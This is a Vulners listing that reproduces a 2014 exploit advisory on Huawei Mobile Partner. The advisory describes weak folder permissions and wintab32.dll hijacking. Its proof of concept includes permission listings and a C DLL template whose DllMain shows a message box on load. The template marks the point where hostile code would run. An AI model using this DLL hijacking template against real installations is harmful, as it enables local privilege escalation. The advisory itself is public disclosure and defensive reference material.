Vulners
Lucene search
Huawei Mobile Partner DLL Hijacking
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2014-8359 | 13 Nov 201421:32 | – | attackerkb |
| CVE-2014-8358 | 11 Dec 201721:29 | – | attackerkb |
 | CVE-2014-8358 | 11 Dec 201721:00 | – | cve |
| CVE-2014-8359 | 13 Nov 201415:00 | – | cve |
 | CVE-2014-8358 | 11 Dec 201721:00 | – | cvelist |
| CVE-2014-8359 | 13 Nov 201415:00 | – | cvelist |
 | EUVD-2014-8195 | 7 Oct 202500:30 | – | euvd |
| EUVD-2014-8196 | 7 Oct 202500:30 | – | euvd |
 | Security Advisory-DLL Hijacking Vulnerability on Huawei USB Modem products | 22 Oct 201400:00 | – | huawei |
 | CVE-2014-8358 | 11 Dec 201721:29 | – | nvd |
10
`# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only
#1| Local Privilege Escalation
--------------------------------
- Description
==============
Any user in the system can modify the legitimate binary to any kind of malicious executable.
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and
perform DLL hijacking easily. If an attacker break into a low privilege account he could use
this application to escalate his privileges.
- Proof of Concept
===================
C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
BUILTIN\Users:(CI)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files>cd "Mobile Partner"
C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH: owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
}
/*EOF*/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Oct 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.01081